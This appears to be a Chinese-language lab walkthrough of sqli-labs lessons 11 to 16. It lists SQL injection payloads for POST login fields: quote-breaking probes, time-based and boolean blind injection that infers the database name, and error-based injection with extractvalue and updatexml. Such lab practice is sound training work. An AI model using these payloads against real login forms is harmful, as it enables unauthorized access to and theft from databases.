typora-root-url: images
Less-11
-
输入正常数据
URL: http://192.168.12.129:81/sqli-labs/Less-11/ payload: uname=aa&passwd=a&submit=Submit
-
尝试注入类型
payload: uname=aa'&passwd=a&submit=Submit
payload: uname=123&submit=Submit&passwd=aa' or sleep(0.3) or '
-
使用时间型盲注
# 获取长度 Post data: uname=123&submit=Submit&passwd=hfh' or if(length(database())=8,sleep(0.3),1) or ' # 获取数据库名 payload: Post data: uname=123&submit=Submit&passwd=hfh' or if(substr(database(),1,1)='s',sleep(0.3),1) or ' # 建议使用脚本爆破
-
报错注入
payload: uname=a' or extractvalue(1, concat(0x7e, database(), 0x7e)) or '&passwd=a&submit=Submit
Less-12
-
尝试注入类型
payload: uname=a") or sleep(3) or ("&passwd=a&submit=Submit # 页面响应大概3左右显示,确定注入点
-
报错注入
payload: uname=a") or updatexml(1,concat(0x7e,database(),0x7e),1) or ("&passwd=a&submit=Submit
Less-13
-
尝试注入类型
payload: uname=a') or sleep(3) or ('&passwd=a&submit=Submit # 页面响应大概3左右显示,确定注入点
-
报错注入
payload: uname=a') or updatexml(1,concat(0x7e,database(),0x7e),1) or ('&passwd=a&submit=Submit
Less-14
-
尝试注入类型
payload: uname=a" or sleep(3) or "&passwd=a&submit=Submit # 页面响应大概3左右显示,确定注入点
-
报错注入
payload: uname=a" or updatexml(1,concat(0x7e,database(),0x7e),1) or "&passwd=a&submit=Submit
Less-15
-
尝试注入类型
payload: uname=a' or sleep(3) or '&passwd=a&submit=Submit # 页面响应大概3左右显示,确定注入点
-
布尔型盲注
payload: uname=a' or length(database())=8 or '&passwd=a&submit=Submit
# 确定数据库名长度为8
payload: uname=a' or substr(database(),1,1)='s' or '&passwd=a&submit=Submit
# 确定数据库第一个字符为's',后续可以使用脚本注入,确定数据库名
-
时间型盲注
payload: uname=a' or if(length(database())=8,sleep(3),1) or '&passwd=a&submit=Submit # 确定数据库名长度为8 payload: uname=a' or if(substr(database(),1,1)='s',sleep(3),1) or '&passwd=a&submit=Submit # 确定数据库第一个字符为's',后续可以使用脚本注入,确定数据库名
Less-16
-
尝试注入类型
payload: uname=a") or sleep(3) or ("&passwd=a&submit=Submit # 页面响应大概3左右显示,确定注入点
-
布尔型盲注
payload: uname=a") or length(database())=8 or ("&passwd=a&submit=Submit
# 确定数据库名长度为8
payload: uname=a") or substr(database(),1,1)='s' or ("&passwd=a&submit=Submit
# 确定数据库第一个字符为's',后续可以使用脚本注入,确定数据库名
-
时间型盲注
payload: uname=a") or if(length(database())=8,sleep(3),1) or ("&passwd=a&submit=Submit # 确定数据库名长度为8 payload: uname=a") or if(substr(database(),1,1)='s',sleep(3),1) or ("&passwd=a&submit=Submit # 确定数据库第一个字符为's',后续可以使用脚本注入,确定数据库名